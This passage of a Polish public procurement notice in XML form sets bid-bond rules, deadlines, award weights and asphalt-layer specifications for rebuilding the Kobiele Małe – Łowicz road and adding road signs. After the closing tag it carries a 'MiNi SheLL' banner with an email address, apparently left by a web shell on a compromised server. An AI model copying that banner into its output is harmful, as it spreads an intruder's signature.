6.	Wadium wnoszone w postaci niepieniężnej należy złożyć w oryginalnym egzemplarzu bezpośrednio do oferty. Zaleca się zamieścić dokument wadialny w taki sposób, aby jego zwrot przez zamawiającego nie naruszył integralności oferty i dołączonych oświadczeń wraz z dokumentami (np. umieszczony w koszulce, co pozwoli na swobodne oddzielenie wadium od reszty dokumentów).
7.	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 Pzp.
8.	Zamawiający zwróci wniesione wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza.
9.	Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10.	Zamawiający zwróci niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.	Zamawiający zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium zgodnie z pkt. 8, jeżeli w wyniku rozstrzygnięcia odwołania, jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca ten wnosi wadium                    w terminie określonym przez zamawiającego.
12.	Wykonawca, którego oferta została wybrana, a który wniósł wadium w pieniądzu, może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia należytego wykonania umowy.
13.	W przypadku Wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium RP oraz wadium wniesionego w formie niepieniężnej, wszelkie spory wynikające z wniesionego wadium rozpatrywał będzie wg prawa polskiego sąd właściwy dla siedziby zamawiającego.
14.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności,                    o których mowa w art. 25 ust. 1 Pzp, oświadczenia, o którym mowa w art. 25a ust. 1 Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa                  w art. 87 ust. 2 pkt 3 Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej
15.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
•	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
•	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
•	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe               z przyczyn leżących po stronie wykonawcy. 
16.	Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona w oparciu o art. 89 ust. 1 pkt 7a Pzp.
17.	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp.
18.	Zamawiający nie wymaga wniesienia wadium dla Części 2 zamówienia.
</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>Zamawiający przewiduje istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zakres, charakter zmian oraz warunki wprowadzenia zmian opisano w projekcie umowy - Rozdział IV Specyfikacji Istotnych Warunków Zamówienia.</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>Część 1 zamówienia: 1)	cena oferty (C) </kryt_0><kryt_0p>59.00</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>16/02/2017</data_skl><godz_skl>09:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki>POLSKI</IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6></IV_6_6><IV_6_5 /><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci>1</nr_czesci><nazwa>Przebudowa drogi gminnej Kobiele Małe – Łowicz, gmina Kobiele Wielkie</nazwa><opis>Część 1 zamówienia:
Zakres robót
Zakres robót obejmuje przebudowę drogi gminnej relacji Kobiele Małe – Łowicz, długości     4 591,44 mb zgodnie z zakresem wskazanym na projekcie zagospodarowania.
Zaprojektowano drogę klasy L przystosowaną do obciążenie ruchem KR1, w tym jezdnię szerokości 4,5 mb o nawierzchni bitumicznej wraz z poboczem utwardzonym szerokości 0,75 mb z lokalnymi zwężeniami (w miejscach zwężeń utrzymane będzie istniejące pobocze gruntowe).
Niweleta nowoprojektowanej nawierzchni dostosowana do istniejącej. 
Przed przystąpieniem do wykonywania warstwy wyrównawczej należy dokonać lokalnych napraw ubytków.
Odwodnienie pasa drogowego powierzchniowe do istniejących rowów przydrożnych.
Konstrukcja drogi
Zaprojektowano jezdnie o nawierzchni bitumicznej z dwustronnym spadkiem poprzecznym 2%.
Konstrukcja jezdni na poszerzeniu
	warstwa ścieralna z betonu asfaltowego AC 11S KR1 gr. 4cm
	warstwa wyrównawcza z betonu asfaltowego AC 16W KR1 śr. gr. 5cm (od km 0+000,00 do km 3+060,00)
	geowłóknina wzmacniana włóknem szklanym szer. 1,0 mb
	warstwa wiążąca z betonu asfaltowego AC 16W KR1 gr. 5cm
	podbudowa zasadnicza z kruszywa łamanego 0/63mm gr. 30 cm
	warstwa odsączająca z piasku gr. 10 cm


Konstrukcja jezdni od km 0+000,00 do km 3+060,00
	warstwa ścieralna z betonu asfaltowego AC 11S KR1 gr. 4cm
	warstwa wyrównawcza z betonu asfaltowego AC 16W KR1 śr. gr. 5cm
Konstrukcja jezdni od km 3+060,00 do km 4+591,44
	warstwa ścieralna z betonu asfaltowego AC 11S KR1 gr. 4cm
Kruszywa powinny spełniać normę PN-B-11112 Kruszywa łamane do nawierzchni drogowych. Warstwy bitumiczne powinny spełniać normę PN-S-96025:2000 Drogi samochodowe i lotniskowe. Nawierzchnie asfaltowe. Wymagania.
Połączenia warstwy ścieralnej z istniejącymi nawierzchniami bitumicznymi dróg należy wykonać przy użyciu taśmy bitumicznej o następujących parametrach:
	gęstość 1,1-1,4 g/cm3
	temperatura mięknienia &gt;90˚C.
Konstrukcja zjazdu
Zaprojektowano remont istniejącego zjazdu poprzez wymianę jego nawierzchni.
Konstrukcja nawierzchni zjazdu
	warstwa ścieralna z betonu asfaltowego AC 11S KR1 gr. 4cm
	warstwa wyrównawcza z betonu asfaltowego AC 16W KR1 śr. gr. 5cm (od km 0+000,00 do km 3+060,00)
	geowłóknina wzmacniana włóknem szklanym szer. 1,0 mb
	warstwa wiążąca z betonu asfaltowego AC 16W KR1 gr. 5cm
	podbudowa zasadnicza z kruszywa łamanego 0/63mm gr. 30 cm
	warstwa odsączająca z piasku gr. 10 cm
Zaprojektowano pobocze zjazdu szerokości 0,75 mb z kruszywa łamanego 0/31,5 mm                  gr. 10 cm.
Konstrukcja poboczy
Zaprojektowano pobocza szerokości 0,75 mb z lokalnymi zwężeniami do granicy pasa drogowego.
W miejscach zwężeń zachowane zostanie istniejące pobocze gruntowe.
Konstrukcja pobocza
Zaprojektowano pobocze o nawierzchni z kruszywa łamanego ze spadkiem poprzecznym 6% - nawierzchnia z kruszywa łamanego 0/31,5 mm gr. 10 cm
Szczegółowy opis przedmiotu zamówienia został zawarty w Rozdziale V SIWZ, na który składają się następujące dokumenty: 
1)	Dokumentacja projektowa 
2)	Specyfikacja techniczna wykonania i odbioru robót 
3)	Przedmiar robót 
Uwaga:
Przedmiar robót został załączony w celach informacyjnych i służy jedynie do opisu przedmiotu zamówienia. Nie stanowi on podstawy do obliczenia ceny przez Wykonawcę.
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>45233220-7</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/08/2017</data_kon><kryt_cena></kryt_cena><kryt_1>cena oferty (C) </kryt_1><kryt_1p>59.00</kryt_1p></cz_0><cz_1><nr_czesci>2</nr_czesci><nazwa>Wykonanie oznakowania pionowego na drodze gminnej Kobiele Małe – Łowicz, gmina Kobiele Wielkie</nazwa><opis>Przedmiotem zamówienia jest wykonanie oznakowania pionowego drogi gminnej Kobiele Małe – Łowicz, gmina Kobiele Wielkie. Zakres zamówienia obejmuje montaż 34 sztuk słupków z rur stalowych o średnicy 70 mm, 6 sztuk tablic znaków drogowych zakazu, nakazu, ostrzegawczych i informacyjnych o powierzchni ponad 0,3 m2 oraz 28 sztuk tablic znaków drogowych kierunku miejscowości.
Szczegółowy opis przedmiotu zamówienia został zawarty w Rozdziale V SIWZ, na który składają się następujące dokumenty: 
1)	Dokumentacja projektowa (projekt organizacji ruchu) 
2)	Specyfikacja techniczna wykonania i odbioru robót 
3)	Przedmiar robót
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>45316213-1</cpv1c><czas>
              O
            </czas><czas_dni>14</czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1>cena oferty (C) </kryt_1><kryt_1p>60.00</kryt_1p></cz_1></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com